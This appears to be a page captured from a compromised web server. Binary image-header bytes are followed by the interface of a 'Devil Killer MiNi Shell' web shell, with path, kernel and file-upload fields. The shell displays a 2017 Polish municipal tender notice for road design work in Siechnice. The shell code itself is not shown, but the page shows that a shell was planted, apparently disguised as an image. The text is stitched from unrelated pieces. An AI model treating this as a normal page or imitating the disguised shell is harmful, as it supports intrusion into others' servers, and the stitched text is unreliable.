JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170310/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170310/41413-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.siechnice.gmina.pl' target='_blank'>http://www.siechnice.gmina.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 41413 - 2017
              z dnia 2017-03-10 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Siechnice: Wielobranżowa dokumentacja projektowa budowy i rozbudowy ulicy Świętego Krzyża i Ziemskiej w Siechnicach oraz ulicy Łąkowej w Świętej Katarzynie, gmina Siechnice wraz z pełnieniem nadzoru autorskiego<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Burmistrz Siechnic, krajowy numer identyfikacyjny
              93193512900000, ul.
              ul. Jana Pawła II 
              12,
              55011  
              Siechnice, woj.
              dolnośląskie, państwo
              Polska, tel.
              71 391 91 01, e-mail
              zp@umsiechnice.pl, faks
              71 786 09 07.
              <br />
              Adres strony internetowej (URL): www.siechnice.gmina.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.siechnice.gmina.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.siechnice.gmina.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />wersja papierowa<br />
                Adres:
                <br />Gmina Siechnice, ul. Jana Pawła II 12, 55-011 Siechnice</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Wielobranżowa dokumentacja projektowa budowy i rozbudowy ulicy Świętego Krzyża i Ziemskiej w Siechnicach oraz ulicy Łąkowej w Świętej Katarzynie, gmina Siechnice wraz z pełnieniem nadzoru autorskiego<br /><b>Numer referencyjny: </b>BZP.271.9.2017.KCh<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Podstawowym celem zamówienia jest uzyskanie dokumentacji projektowej wraz z uzyskaniem ostatecznej decyzji o zezwoleniu na realizację inwestycji drogowej, razem z decyzjami, uzgodnieniami, umowami, warunkami, ekspertyzami, analizami i pomiarami niezbędnymi do jej uzyskania 
i prawidłowej realizacji inwestycji pn: Wielobranżowa dokumentacja projektowa budowy lub przebudowy ulicy Św. Krzyża i Ziemskiej w Siechnicach oraz ulicy Łąkowej w Świętej Katarzynie wraz z pełnieniem nadzoru autorskiego" - w podziale na Zadania i Etapy:
ZADANIE 1: opracowanie dokumentacji projektowej, z podziałem na Etapy:
1)Etap I: Opracowanie dokumentacji projektowej wraz z uzyskaniem ostatecznej decyzji ZRID, razem z decyzjami, uzgodnieniami i umowami, warunkami, ekspertyzami, analizami, badaniami oraz pomiarami niezbędnymi do jej uzyskania i prawidłowej realizacji zadania: pn.: Wielobranżowa dokumentacja projektowa budowy i przebudowy ulicy Św. Krzyża i Ziemskiej w Siechnicach oraz ulicy Łąkowej w Świętej Katarzynie" Etap I: Dokumentacja projektowa włączenia ul. Świętego Krzyża do ul. Opolskiej (DK94) w Siechnicach" - opisane w szczegółowym opisie zamówienia.
2)Etap II: Opracowanie dokumentacji projektowej wraz z uzyskaniem ostatecznej decyzji ZRID, razem z decyzjami, uzgodnieniami i umowami, warunkami, ekspertyzami, analizami, badaniami oraz pomiarami niezbędnymi do jej uzyskania i prawidłowej realizacji zadania: pn.: Wielobranżowa dokumentacja projektowa budowy i przebudowy ulicy Św. Krzyża i Ziemskiej w Siechnicach oraz ulicy Łąkowej w Świętej Katarzynie" Etap II: Dokumentacja projektowa budowy i przebudowy ul. Świętego Krzyża wraz ze skrzyżowaniem z ul. Ziemską w Siechnicach i Łąkową w Świętej Katarzynie i Różaną w Siechnicach oraz projektem przebudowy mostu na rzece Zielona (inaczej Szalona) i dokumentacją projektową budowy ul. Różanej na długości działki nr 193 w Siechnicach - opisane w szczegółowym opisie zamówienia.
3)Etap III: Opracowanie dokumentacji projektowej wraz z uzyskaniem ostatecznej decyzji pozwolenia na budowę razem z decyzjami, uzgodnieniami i umowami, warunkami, ekspertyzami, analizami, badaniami oraz pomiarami niezbędnymi do jej uzyskania i prawidłowej realizacji zadania: pn.: Wielobranżowa dokumentacja projektowa budowy i przebudowy ulicy Św. Krzyża i Ziemskiej w Siechnicach oraz ulicy Łąkowej w Świętej Katarzynie" Etap III: Dokumentacja projektowa budowy ul. Łąkowej w Świętej Katarzynie od skrzyżowania z ul. Św. Krzyża w Siechnicach do skrzyżowania z ul. Główną w Świętej Katarzynie - opisane w szczegółowym opisie zamówienia.
4)Etap IV: Opracowanie dokumentacji projektowej wraz z uzyskaniem ostatecznej decyzji pozwolenia na budowę razem z decyzjami, uzgodnieniami i umowami, warunkami, ekspertyzami, analizami, badaniami oraz pomiarami niezbędnymi do jej uzyskania i prawidłowej realizacji zadania: pn.: Wielobranżowa dokumentacja projektowa budowy i przebudowy ulicy Św. Krzyża i Ziemskiej w Siechnicach oraz ulicy Łąkowej w Świętej Katarzynie" Etap IV: Dokumentacja projektowa budowy ul. Ziemskiej od skrzyżowania z ul. Św. Krzyża w Siechnicach do skrzyżowania z ul. Główną w Świętej Katarzynie wraz ze skrzyżowaniami z ulicami do niej przyległymi -opisane w szczegółowym opisie zamówienia.
ZADANIE 2: pełnienie nadzoru autorskiego nad dokumentacja projektowa opracowana w ramach Zadania 1.
Szczegółowy opis przedmiotu zamówienia stanowi Załącznik nr 1A wraz z załącznikami do SIWZ.
Wspólny Słownik Zamówień CPV: 71322000-1 Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej.
Zamawiający nie przewiduje możliwości udzielenie zamówień, o których mowa w art. 67 ust.1 pkt 6.
Wykonawca jest zobowiązany wykonać wszystkie opisane w przedmiotowym postępowaniu.
Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, stanowią załącznik do niniejszej SIWZ.
Przedmiot zamówienia musi zostać wykonany zgodnie ze specyfikacją istotnych warunków zamówienia i zasadami wiedzy technicznej, a Wykonawca zobowiązany jest do wykonania wszelkich prac niezbędnych do osiągnięcia zakładanego rezultatu.
Wykonawca zobowiązany będzie wykonać przedmiot zamówienia z uwzględnieniem: materiałów, wyrobów dopuszczonych do stosowania w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2016 r., poz. 290 ze zm.) oraz ustawy z dnia 16 kwiecień 2004 r. o wyrobach budowlanych (tj.: Dz. U. z 2016 r., poz. 1570 ze zm.).
Wykonawca nie może czerpać korzyści z tytułu błędów lub przeoczeń znajdujących się w dokumentacji i w przypadku ich odkrycia winien natychmiast o tym powiadomić Zamawiającego, który zadecyduje o wprowadzeniu odpowiednich zmian lub poprawek.
Wykonawca zobowiązuje się do posiadania odpowiednich umów ubezpieczeniowych z tytułu szkód, które mogą zaistnieć w związku z określonymi zdarzeniami losowymi oraz od odpowiedzialności cywilnej, przez cały czas wykonywania zlecenia do czasu odbioru końcowego.
Zamawiający nie zastrzega obowiązku osobistego wykonania przez wykonawcę kluczowych części zamówienia.
Termin zalecanej wizji w terenie w dniu 16.03.2017 r. w godzinach od 10:00 do 11:00. Zebranie wykonawców o godzinie 10:00 w miejscu:  Siechnice, skrzyżowanie ul. Świętego Krzyża z ul. Opolską.
Zamawiający zastrzega sobie w trakcie obowiązywania umowy prawo wskazania innego podmiotu, który będzie wykonywał obowiązki Zamawiającego, zmiana ta nie wymaga formy aneksu do umowy, lecz jedynie pisemnego powiadomienia<br /><br /><b>II.5) Główny kod CPV: </b>71322000-1<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/06/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b>4.1. Zgodnie z treścią ogłoszenia, wykonawca który wygra przetarg zobowiązany jest do zrealizowania zadania w terminie do:
a)Zadanie 1 Etap I, Etap II i Etap IV do 30.06.2018 r.; Etap III do 30.08.2017 r.
b)Zadanie 2: W okresie 3 lat od daty wydania ostatecznej decyzji ZRID oraz ostatecznej decyzji pozwolenia na budowę dla poszczególnych Etapów.
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia warunku w tym zakresie<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Wykonawca spełni warunek jeżeli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjna co najmniej 100 000,00 zł.<br />
                Informacje dodatkowe
                Wykonawca, który polega na sytuacji finansowej lub ekonomicznej innych podmiotów, odpowiada solidarnie z podmiotem, który zobowiązał się do udostępnienia zasobów, za szkodę poniesioną przez zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.<br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca spełni warunek jeżeli:
a) wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli  okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował minimum trzy usługi polegające na opracowaniu dokumentacji projektowej rozbudowy, budowy lub przebudowy dróg, ulic, chodników o nawierzchni z betonu asfaltowego o długości minimum 1000 m, w zakresie których wchodził remont, rozbudowa, budowa lub przebudowa kanalizacji deszczowej. Wykonawca zobowiązany jest do podania ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane należycie.
W przypadku, gdy wskazana usługa obejmowała również inne świadczenia, Wykonawca musi podać wartość dotyczącą wyłącznie tej części zamówienia, która obejmowała świadczenie wymaganego przez Zamawiającego powyżej zakresu.
Zamawiający uzna za spełniony warunek jeżeli Wykonawca wykaże się doświadczeniem w realizacji projektu drogowego i oddzielnie kanalizacji deszczowej pod warunkiem spełnienia łącznie wymagań Zamawiającego.
b) przy opracowaniu projektu zostaną wskazane materiały które będą posiadały właściwości użytkowe wymagane przy realizacji takich obiektów, a także będą posiadały ważne atesty, certyfikaty i deklaracje zgodności dopuszczające do stosowania na terenie Polski,
c) zaakceptuje warunki przetargu oraz warunki do rozliczeń prac przewidzianych na etapie niniejszego postępowania na zasadach określonych w istotnych postanowieniach do umowy, nie objętych niniejszym zamówieniem jeżeli wystąpią i będą zaakceptowane przez Zamawiającego,
d) dysponuje personelem posiadającym uprawnienia i doświadczenie wraz z informacją 
o uprawnieniach, doświadczeniu i podstawie do dysponowania tą/tymi osobą/osobami: 
	Projektantem w specjalności inżynieryjnej drogowej bez ograniczeń lub odpowiadającej im uprawnienia w specjalności konstrukcyjno-budowlanej bez ograniczeń wydane przed 11.07.2013 r., który posiada doświadczenie w wykonaniu (jako projektant w branży inżynieryjnej drogowej lub konstrukcyjno-budowlanej wydane przed 11.07.2003 r.) minimum trzech dokumentacji projektowych rozbudowy, budowy, przebudowy lub remontu dróg, ulic, chodników o długości min. 500 m oraz doświadczenie projektanta w ramach uzyskania decyzji w procedurze ZRID. Doświadczenie projektanta branży drogowej stanowi kryterium oceny ofert. Zamawiający nie stawia warunku określającego w jakim okresie projektant wykonał/wykonywał dokumentacje projektowe.
W zakresie posiadanego doświadczenia projektanta branży drogowej, Zamawiający określa warunki dotyczące kryterium oceny ofert zgodnie z punktem 13 niniejszej SIWZ.
	Projektantem w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń z minimum pięcioletnim doświadczeniem;
	Projektantem w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wodociągowych i kanalizacyjnych bez ograniczeń z minimum pięcioletnim doświadczeniem.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                Doświadczenie projektanta branży drogowej stanowi kryterium oceny ofert. Zamawiający nie stawia warunku określającego w jakim okresie projektant wykonał/wykonywał dokumentacje projektowe.</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Na wezwanie Wykonawca musi dostarczyć aktualną informację z właściwego rejestru jeżeli odrębne przepisy wymagają wpisu do rejestru (KRS, CDIDG), uzyskaną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, od osób fizycznych oświadczenia w zakresie art. 24 ust. 1 lub wskazania przez wykonawcę dostępności przedmiotowych dokumentów w formie elektronicznej pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagany dokument lub oświadczenie musi być złożony przez każdego wykonawcę.
UWAGA: Samodzielnie pobrane wydruki komputerowe aktualnych informacji 
o podmiotach wpisanych do Krajowego Rejestru Sądowego oraz zaświadczeń z Centralnej Ewidencji i Informacji o Działalności Gospodarczej posiadają status dokumentów oryginalnych, informacja musi zawierać dane umożliwiające weryfikację z danymi zawartymi w rejestrze.
a) W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagany dokument (lub podaje dostępność w formie elektronicznej) musi być złożony (podany) przez każdego wykonawcę.
b) W przypadku wykonawcy mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów wymienionych wyżej  składa dokument lub dokumenty wystawione w kraju, w którym ma miejsce zamieszkania lub siedzibę.
c) W przypadku powoływania się na podmiot trzeci  podmiot trzeci składa wymagany dokument (lub podaje dostępność w formie elektronicznej) musi być złożony (podany) przez każdy podmiot.
d) W przypadku osób fizycznych nie prowadzących działalności gospodarczej wykonawca składa oświadczenie.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Na wezwanie wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentów potwierdzających, że te usługi zostały wykonane lub są wykonywane należycie. Referencje w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych powinno być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert w przedmiotowym postępowaniu.
a)Należy wykazać się doświadczeniem w zakresie opracowania co najmniej trzech usługi polegające na opracowaniu dokumentacji projektowej rozbudowy, budowy lub przebudowy dróg, ulic, chodników o nawierzchni z betonu asfaltowego o długości minimum 1000 m, w zakresie których wchodził remont, rozbudowa, budowa lub przebudowa kanalizacji deszczowej. Wykonawca zobowiązany jest do podania ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane należycie. 
b)W przypadku, gdy wskazana usługa obejmowała również inne świadczenia, Wykonawca musi podać wartość dotyczącą wyłącznie tej części zamówienia, która obejmowała świadczenie wymaganego przez Zamawiającego powyżej zakresu.
c)Zamawiający uzna za spełniony warunek jeżeli Wykonawca wykaże się doświadczeniem w realizacji projektu drogowego i oddzielnie kanalizacji deszczowej pod warunkiem spełnienia łącznie wymagań Zamawiającego
d)Wzór wykazu stanowi załącznik do specyfikacji istotnych warunków zamówienia (Wykaz wykonanych/ wykonywanych w ciągu ostatnich trzech lat usług). Dowodami, o których mowa powyżej są:
referencje lub inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane,
inne dokumenty jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie tych dokumentów uzyskać. 
Treść dokumentów musi potwierdzać że usługi zostały wykonane w sposób należyty.
e)Wykonawca zobowiązany jest w wykazie, o którym mowa powyżej, wskazać usługi odpowiadające swoim rodzajem usłudze stanowiącej przedmiot zamówienia.
f)W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagane informacje mogą być złożone wspólnie lub oddzielnie przez wykonawców.
